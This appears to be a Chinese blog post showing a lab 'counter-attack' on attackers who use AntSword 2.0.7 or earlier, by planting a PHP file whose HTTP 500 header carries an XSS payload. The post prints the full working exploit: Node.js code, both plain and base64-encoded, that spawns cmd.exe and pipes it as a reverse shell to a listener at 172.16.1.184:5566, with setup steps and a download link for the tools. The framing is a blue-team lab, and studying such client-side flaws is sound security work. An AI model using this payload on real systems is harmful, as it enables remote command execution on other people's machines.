蚁剑低版本反制

蚁剑低版本反制

漏洞概述

   中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

影响范围

AntSword <=2.0.7

蚁剑实验版本:2.0.7

环境搭建:

172.16.1.233(蓝队服务器)(kali)

172.16.1.235(红队)(win10)

172.16.1.184(蓝队反制)(win10)

反制过程:

漏洞:

<?php
header('HTTP/1.1 500 <img src=# onerror=alert(1)>');

利用:

在 Node.js 中提供了一个 net.Socket 对象,用于方便调用底层 Socket 接口,实现数据传输的功能。net.Socket 既可以读也可以写,这个 client 建立 socket 链接,实现了将对方 cmd.exe 的标准输入输出与标准错误流转发到受害者自己的 ip:5566端口上。

var net = require("net"), sh = require("child_process").exec("cmd.exe"); var client = new net.Socket(); client.connect(5566, "172.16.1.184", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);})

将上面 base64 编码完成的内容放进 Buffer 函数中

组合后payload:

编码前

<?php
header("HTTP/1.1 500 Not <img src=# οnerrοr='eval(new Buffer(`var net = require("net"), sh = require("child_process").exec("cmd.exe"); var client = new net.Socket(); client.connect(5566, "172.16.1.184", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});`,`base64`).toString())'>")

完整payload:

<?php
header("HTTP/1.1 500 Not <img src=# οnerrοr='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7IHZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOyBjbGllbnQuY29ubmVjdCg1NTY2LCAiMTcyLjE2LjEuMTg0IiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTtzaC5zdGRlcnIucGlwZShjbGllbnQpO30pOw==`,`base64`).toString())'>");

将红队的木马替换成我们的反制木马

蓝队服务器我用的kali

开启apache服务命令: service apache2 start

在这里插入图片描述

172.16.1.184(蓝队反制)NC开启监听:

图片

172.16.1.235(红队)使用蚁剑连接:

图片

172.16.1.184(蓝队反制)接到红队shell

图片

蚁剑和nc下载:

链接:https://pan.baidu.com/s/1OBWFSPz38pUpnKMz09FUyQ 
提取码:joyb
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值